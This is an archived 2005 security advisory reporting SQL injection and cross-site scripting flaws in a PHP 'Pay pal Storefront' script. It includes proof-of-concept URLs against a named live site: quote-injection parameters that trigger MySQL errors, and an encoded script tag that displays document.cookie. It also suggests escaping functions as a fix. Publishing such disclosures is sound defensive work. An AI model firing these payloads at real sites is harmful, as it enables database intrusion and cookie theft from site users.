Multiple sql injection, and xss vulnerabilities in Pay pal Storefront

2005-03-31T00:00:00
ID SECURITYVULNS:DOC:8182
Type securityvulns
Reporter Securityvulns
Modified 2005-03-31T00:00:00

Description

Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/

Severity: High Title: Multiple sql injection, and xss vulnerabilities in Pay pal Storefront Date: March 25, 2005

Summary: There are multiple sql injection, xss vulnerabilities in the Pay pal Storefront script.

Proof of Concept Exploits:

http://www.esmistudio.com/hv/ecdis/pages.php?idpages='SQL INJECTION You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL INJECTION' at line 1

http://www.esmistudio.com/hv/ecdis/products1.php?id=6&id2='SQL INJECTION&subcat=Asus&p=products1 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL INJECTION ORDER BY title ASC LIMIT 0, 9' at line 1

http://www.esmistudio.com/hv/ecdis/products1h.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&id2=10&subcat=Asus&p=products1 This shows the cookie data. Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(),mysql_real_escape_string() and other functions for input validation beforepassing user input to the mysql database, or before echoing data on thescreen, would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, Email:dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact meregarding these vulnerabilities. You can find me at,http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab.Lookout for my soon to come out book on Secure coding with php.